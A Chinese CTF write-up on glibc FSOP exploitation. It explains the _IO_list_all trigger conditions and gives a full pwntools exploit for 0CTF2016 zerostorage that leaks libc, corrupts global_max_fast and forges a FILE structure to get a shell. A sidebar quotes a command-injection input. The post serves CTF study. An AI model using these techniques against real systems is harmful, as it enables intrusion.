新姿勢Get:覆寫_IO_list_all 來getshell ,0CTF2016 zerostorage 的exp以及心得體會

原創 哒君 2020-07-02 01:51

先看大佬的總結 -> https://www.jianshu.com/p/a6354fa4dbdf

關於FSOP的要點就是:

  • FSOP選擇的觸發方法是調用_IO_flush_all_lockp

IO_flush_all_lockp函數觸發條件:

  1. 當libc執行abort流程時 abort可以通過觸發malloc_printerr來觸發
  2. 當執行exit函數時
  3. 當執行流從main函數返回時

_IO_list_all的結構:

pwndbg> p *_IO_list_all
$1 = {
  file = {
    _flags = 0xfbad2086, 
    _IO_read_ptr = 0x0, 
    _IO_read_end = 0x0, 
    _IO_read_base = 0x0, 
    _IO_write_base = 0x0, 
    _IO_write_ptr = 0x0, 
    _IO_write_end = 0x0, 
    _IO_buf_base = 0x0, 
    _IO_buf_end = 0x0, 
    _IO_save_base = 0x0, 
    _IO_backup_base = 0x0, 
    _IO_save_end = 0x0, 
    _markers = 0x0, 
    _chain = 0x7ffff7dd2620 <_IO_2_1_stdout_>
    _fileno = 0x2, 
    _flags2 = 0x0, 
    _old_offset = 0xffffffffffffffff, 
    _cur_column = 0x0, 
    _vtable_offset = 0x0, 
    _shortbuf = "", 
    _lock = 0x7ffff7dd3770 <_IO_stdfile_2_lock>, 
    _offset = 0xffffffffffffffff, 
    _codecvt = 0x0, 
    _wide_data = 0x7ffff7dd1660 <_IO_wide_data_2>, 
    _freeres_list = 0x0, 
    _freeres_buf = 0x0, 
    __pad5 = 0x0, 
    _mode = 0x0, 
    _unused2 = '\000' <repeats 19 times>
  }, 
  vtable = 0x7ffff7dd06e0 <_IO_file_jumps>
}

僞造的_IO_FILE_plus結構體要繞過的check:

1.(fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
   
或者是
2.
_IO_vtable_offset (fp) == 0 
&& fp->_mode > 0 
&& (fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base)

zerostorage

保護全開

具體分析 -> https://www.anquanke.com/post/id/178418#h2-6

exp:

from pwn import *
context(arch='amd64',os='linux',log_level='debug')
#io = process('LD_PRELOAD=./a ./zerostorage',shell=True)
io = process('./zerostorage')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

ru = lambda x : io.recvuntil(x,drop=True)
rn = lambda x : io.recv(x)
r = lambda x : io.recv()
sl = lambda x : io.sendline(x)
s = lambda x : io.send(x)

def insert(content):
	ru('Your choice: ')
	sl('1')
	ru('Length of new entry: ')
	sl(str(len(content)))
	ru('Enter your data: ')
	s(content)
	
def update(idx,content):
	ru('Your choice: ')
	sl('2')
	ru('Entry ID: ')
	sl(str(idx))
	ru('Length of entry: ')
	sl(str(len(content)))
	ru('Enter your data: ')
	s(content)
	
def merge(idx1,idx2):
	ru('Your choice: ')
	sl('3')
	ru('Merge from Entry ID: ')
	sl(str(idx1))
	ru('Merge to Entry ID: ')
	sl(str(idx2))
	ru('New entry ID is ')
	return int(ru('.'))
	
def delete(idx):
	ru('Your choice: ')
	sl('4')
	ru('Entry ID: ')
	sl(str(idx))
	
def view(idx):
	ru('Your choice: ')
	sl('5')
	ru('Entry ID: ')
	sl(str(idx))
	ru(':\n')
	return rn(16)
	
def build_fake_file(addr,vtable):
	flag=0xfbad2887
	#flag&=~4
	#flag|=0x800
	fake_file=p64(flag)               #_flags
	fake_file+=p64(addr)             #_IO_read_ptr
	fake_file+=p64(addr)             #_IO_read_end
	fake_file+=p64(addr)             #_IO_read_base
	fake_file+=p64(addr)             #_IO_write_base
	fake_file+=p64(addr+1)             #_IO_write_ptr
	fake_file+=p64(addr)         #_IO_write_end
	fake_file+=p64(addr)                    #_IO_buf_base
	fake_file+=p64(0)                    #_IO_buf_end
	fake_file+=p64(0)                       #_IO_save_base
	fake_file+=p64(0)                       #_IO_backup_base
	fake_file+=p64(0)                       #_IO_save_end
	fake_file+=p64(0)                       #_markers
	fake_file+=p64(0)                       #chain   could be a anathor file struct
	fake_file+=p32(1)                       #_fileno
	fake_file+=p32(0)                       #_flags2
	fake_file+=p64(0xffffffffffffffff)      #_old_offset
	fake_file+=p16(0)                       #_cur_column
	fake_file+=p8(0)                        #_vtable_offset
	fake_file+=p8(0x10)                      #_shortbuf
	fake_file+=p32(0)
	fake_file+=p64(0)                    #_lock
	fake_file+=p64(0xffffffffffffffff)      #_offset
	fake_file+=p64(0)                       #_codecvt
	fake_file+=p64(0)                    #_wide_data
	fake_file+=p64(0)                       #_freeres_list
	fake_file+=p64(0)                       #_freeres_buf
	fake_file+=p64(0)                       #__pad5
	fake_file+=p32(0xffffffff)              #_mode
	fake_file+=p32(0)                       #unused2
	fake_file+=p64(0)*2                     #unused2
	fake_file+=p64(vtable)                       #vtable
	return fake_file

insert('a'*16)			#0
insert('a'*16)			#1
insert('a'*16)			#2
insert('a'*16)			#3
insert('a'*16)			#4
insert('a'*16)			#5
insert((0x1000)*'a')	#6
insert(0x400*'a')		#7
insert('a'*16)				#8
insert(0x60*'a')		#9
merge(7,6)				#10
delete(2)
merge(0,0)			#2
#此處merge釋放的塊與delete釋放的塊不能挨着,否則會合並,導致無法leak出heap的地址

leak = view(2)
heap_base = u64(leak[:8]) & 0xfffffffffffff000
leak_addr = u64(leak[8:])
libc_base = leak_addr - 88 - 0x3c4b20
libc.address = libc_base
global_max_fast = libc_base + 0x3c67f8
#這個偏移是通過gdb.attach(io)以後用p /x &global_max_fast減去libc_base算出來的

one_gadget=libc_base+0xf1147	# 0x45216 0x4526a 0xf02a4 0xf1147
log.success('libc base: '+hex(libc_base))
log.success('heap base: '+hex(heap_base))
fake_file = build_fake_file(0,heap_base+0x90*7+0x1010+0x410)
insert(0x400*'a')
insert(0x1000*'a')
update(6,fake_file[0x10:].ljust(0x1000,'a'))
merge(0,6)
update(9,p64(one_gadget)*(0x50/8))
insert('a'*16)
insert('a'*16)
#爲了讓unsorted bin鏈表變空

merge(4,4)
update(11,p64(leak_addr)+p64(global_max_fast-0x10))
insert('a'*16)
#修改global_max_fast

delete(7)
sl('7')
io.interactive()
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

RoarCTF2019 [MISC:黃金6年][Web:Easy Calc]總結與復現

前言 去年做了RoarCTF線上賽題。只做出一道MISC題。去年已經把MISC題黃金6年和Web題Easy Calc總結並復現了一下。 現在才發現忘記發博客了。。尷尬。。( 其他題有時間會復現) MISC:黃金6年 下載之後,發現

Qwzf 2020-07-07 18:04:49

ISCC2020 擂臺題Web總結與復現

擂臺Web1:Easy Injection 題目難度:簡單考察:python模板注入(jinja2模板注入) 典型的模板注入,無任何過濾,直接構造利用payload: http://101.201.126.95:7050/{{ c

Qwzf 2020-07-07 18:04:48

合天網安實驗室CTF-解密100-Funny Crypto

合天網安實驗室CTF-解密100-Funny Crypto 題目描述   tgbnjuy 8ujko9 5rfgy6 相關附件 參考解題步驟 字母 被圍起來的字母 圖示顏色 tgbnjuy h 紅 8ujko

皮卡皮卡~ 2020-07-08 09:00:51

長度擴展攻擊詳解

這幾天在看密碼學的長度擴展攻擊,看了不少文章,感覺都說得不夠清楚,自己弄清楚之後想寫一篇,做一個記錄。 1. 簡介        長度擴展攻擊(length extension attack),是指針對某些允許包含額外信息的加密散列函數

szuaurora 2020-07-08 06:53:55

2017zctf misc300

下載題目後是個zip壓縮包,帶有密碼,本質是zip僞加密,解決方法可以是用壓縮包自帶的修復功能,或者用二進制打開工具修改zip文件頭,或者直接在linux下用binwalk –e 直接解壓 成功解壓後是幾個不熟悉的文件格式,還是用binw

szuaurora 2020-07-08 06:53:53

[GXYCTF2019]BabySQli

看了大佬的博客,勉強整出來了,詳細的寫一下我的思路。 錯誤思路: 觀察發現是post傳值,想用sqlmap一把嗦,BP抓包=>sqlmap 得到數據庫:web_sqli 表:user 字段:passwd 得到密碼是cdc9c81

imbia 2020-07-08 02:36:55

君莫笑系列視頻學習(5)(終)

這次視頻講解的是通過jmp esp佈置跳到shellcode執行   pwn_by_example_7_b0verfl0w (jmp esp):https://www.bilibili.com/video/av35112734 與這個視頻

言承Yolanda 2020-07-08 01:37:50

君莫笑系列視頻學習(2)

早上九點起牀,洗漱喫飯,要十點了,明天早點睡,希望寒假越起越早。。。 現在又到了開心的學習時間。   pwn入門系列-2-一個簡單的例子 https://www.bilibili.com/video/av14824239/?spm_id_

言承Yolanda 2020-07-08 01:37:40

君莫笑系列視頻學習(4)

接下來,視頻講解的都是各個例子(https://space.bilibili.com/14500640/) (1)程序中自身就含有system函數和"/bin/sh"字符串 (2)程序中自身就有system函數,但是沒有"/bin/sh"

言承Yolanda 2020-07-08 01:37:40

re學習筆記(67)SCTF-re-signin

考察的是python的exe文件反編譯成py文件這個知識點, 所用工具在我的GitHub:https://github.com/Eliauk55/CTF-tools 先用pyinstxtractor.py得到exe轉pyc文件

我也不知道起什么名字呐 2020-07-07 22:52:30

[CTF]攻防世界web高手進階區Writeup(更新ing)

baby_web EMMMM,這就是一個簽到題~ 解題方法: F12→Networks→刷新抓包→完成 Training-WWW-Robots   看題目可以知道這道題考的是爬蟲協議(robots.txt文件)的知識 打

0pen1 2020-07-07 21:39:58

i春秋2020新春公益賽 GYCTF有關SQL注入題復現

0x00 前言 最近這段時間參加過一些CTF在線競賽,做過一些Web題,發現SQL注入漏洞出現的頻率可真高!不過在做題中也get到了一些Web新知識,現在通過題目復現的方式總結一下。 0x01 blacklist 考點:堆疊注入+

Qwzf 2020-07-07 18:04:49

實驗吧--Web1

實驗吧平臺維護到現在一直都還沒維護好,我的好多松果都涼涼了,現在到了暑假特意把以前做過的題翻來重新寫成博客,主要的目的是爲了學習做題的思路,當然還有的題當時不會做,也不懂原理,經過一年多的學習,也瞭解了一些,所以就特意寫寫加強記憶。實踐纔

红烧兔纸 2020-07-07 16:44:45

攻防世界mobile新手區之easy jni 以及easy-apk的write up

0x01上dex2jar: 得到關鍵代碼: private boolean a(String paramString) { try { return ncheck((new a()).a(paramString.ge

KogRow 2020-07-07 15:59:23

攻防世界WEB部分write up

新手入門區域 1.command_execution 小寧寫了個ping功能,但沒有寫waf,X老師告訴她這是非常危險的,你知道爲什麼嗎。 wp: 輸入127.0.0.1;ls,發現可執行後面的ls,故直接用find命令查找:127.0.

KogRow 2020-07-07 15:59:23